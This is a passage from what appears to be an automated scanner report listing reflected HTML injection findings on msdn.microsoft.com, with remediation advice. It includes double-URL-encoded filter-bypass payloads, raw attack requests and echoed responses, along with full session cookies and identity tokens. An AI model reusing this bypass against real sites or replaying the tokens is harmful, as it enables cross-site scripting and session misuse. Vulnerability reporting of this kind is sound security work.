msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87f9c"><a>4444cb60aed/library/ms123401" />
...[SNIP]...

2.106. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms123401.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b6c%2522%253e%253ca%253ea82109ceb41 was submitted in the REST URL parameter 2. This input was echoed as 48b6c"><a>a82109ceb41 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library48b6c%2522%253e%253ca%253ea82109ceb41/ms123401.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library48b6c"><a>a82109ceb41/ms123401" />
...[SNIP]...

2.107. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms123401.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3898%2522%253e%253ca%253e4b48fd0aba8 was submitted in the REST URL parameter 3. This input was echoed as c3898"><a>4b48fd0aba8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms123401.aspxc3898%2522%253e%253ca%253e4b48fd0aba8 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms123401.aspxc3898"><a>4b48fd0aba8" />
...[SNIP]...

2.108. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms376734.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d4f%2522%253e%253ca%253e3bf87eee46 was submitted in the REST URL parameter 1. This input was echoed as 16d4f"><a>3bf87eee46 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us16d4f%2522%253e%253ca%253e3bf87eee46/library/ms376734.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us16d4f"><a>3bf87eee46/library/ms376734" />
...[SNIP]...

2.109. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms376734.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1de4%2522%253e%253ca%253e15de1465623 was submitted in the REST URL parameter 2. This input was echoed as b1de4"><a>15de1465623 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryb1de4%2522%253e%253ca%253e15de1465623/ms376734.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryb1de4"><a>15de1465623/ms376734" />
...[SNIP]...

2.110. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms376734.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5baf%2522%253e%253ca%253ed814d454776 was submitted in the REST URL parameter 3. This input was echoed as f5baf"><a>d814d454776 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms376734.aspxf5baf%2522%253e%253ca%253ed814d454776 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms376734.aspxf5baf"><a>d814d454776" />
...[SNIP]...

2.111. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 1]  previous  next

Summary

Severity:   High
